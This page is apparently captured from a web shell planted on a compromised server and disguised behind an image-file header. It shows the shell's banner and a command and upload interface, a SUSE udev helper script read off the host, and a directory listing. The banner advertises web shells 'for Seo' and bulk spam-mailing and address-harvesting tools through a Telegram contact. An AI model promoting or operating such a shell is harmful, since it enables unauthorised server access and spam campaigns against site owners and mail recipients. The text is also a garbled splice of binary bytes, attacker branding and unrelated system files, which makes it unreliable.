xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
#!/bin/bash
#
# cciss_id
#
# Generates device node names according to the cciss naming rules
#
# Copyright (C) 2011 SUSE Linux Products GmbH
# Author:
#       Hannes Reinecke <hare@suse.de>
#
#
#       This program is free software; you can redistribute it and/or modify it
#       under the terms of the GNU General Public License as published by the
#       Free Software Foundation version 2 of the License.
#
# This script generates a device node name which is compatible
# with the 'cciss' device naming rules.
# It is intended to provide backward-compatible names for the
# 'hpsa' driver.
#

cciss_enumerate()
{
    local last_pci_dev=${1##0000:}
    local cur_pci_dev
    local cciss_num=0

    for cur_pci_dev in $(lspci -n | tac | sed -n 's/\(..:..\..\) .* 103c:\(3220\|3230\|3238\|323a\|323b\) .*/\1/p') ; do
	if [ "$cur_pci_dev" == "$last_pci_dev" ] ; then
	    echo "$cciss_num"
	    return;
	fi
	cciss_num=$(($cciss_num + 1))
    done
    echo "$cciss_num"
}

hpsa_lun_offset()
{
    local scsi_host=$1

    scsi_id=$(lsscsi 2>/dev/null | sed -n "s/.\(${scsi_host}:[0-9]*:[0-9]*:[0-9]*\)..*disk .*/\1/p" | head -1)
    echo ${scsi_id##*:}
}

DEVPATH=$1
SCSIPATH=$(cd -P /sys$DEVPATH/device; echo $PWD)
SCSIID=${SCSIPATH##*/}
HOSTID=${SCSIID%%:*}
LUNID=${SCSIID##*:}
PCIPATH=${SCSIPATH%%/host*}
PCIDEV=${PCIPATH##*/}
HOSTPATH=${PCIPATH}/host${HOSTID}/scsi_host/host${HOSTID}
read controller 2>/dev/null <${HOSTPATH}/ctlr_num || controller=$(cciss_enumerate $PCIDEV)

# hpsa lies about the LUN ...
disk_offset=$(hpsa_lun_offset $HOSTID)
if [ "$disk_offset" ] ; then
    disk=$(( $LUNID - $disk_offset ))
else
    disk=$LUNID
fi

if [ "$controller" ] && [ "$disk" ] ; then
    echo "ID_CCISS=c${controller}d${disk}"
fi

Filemanager

Name Type Size Permission Actions
hwdb.d Folder 0755
rules.d Folder 0755
ata_id File 46.26 KB 0755
cciss_id File 1.69 KB 0755
cdrom_id File 58.26 KB 0755
collect File 26.2 KB 0755
compat-symlink-generation File 28 B 0644
convert-lib-udev-path.sh File 2.82 KB 0755
fc_wwpn_id File 1.04 KB 0755
iwlwifi-led.sh File 286 B 0755
kpartx_id File 2.33 KB 0755
mtd_probe File 10.09 KB 0755
mtp-probe File 10.3 KB 0755
path_id_compat File 66.35 KB 0755
rootsymlink-generator File 42.27 KB 0755
rule_generator.functions File 3.38 KB 0755
scsi_id File 58.78 KB 0755
udev-generate-persistent-rule File 11.86 KB 0755
v4l_id File 18.19 KB 0755
write_net_rules File 4.79 KB 0755
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1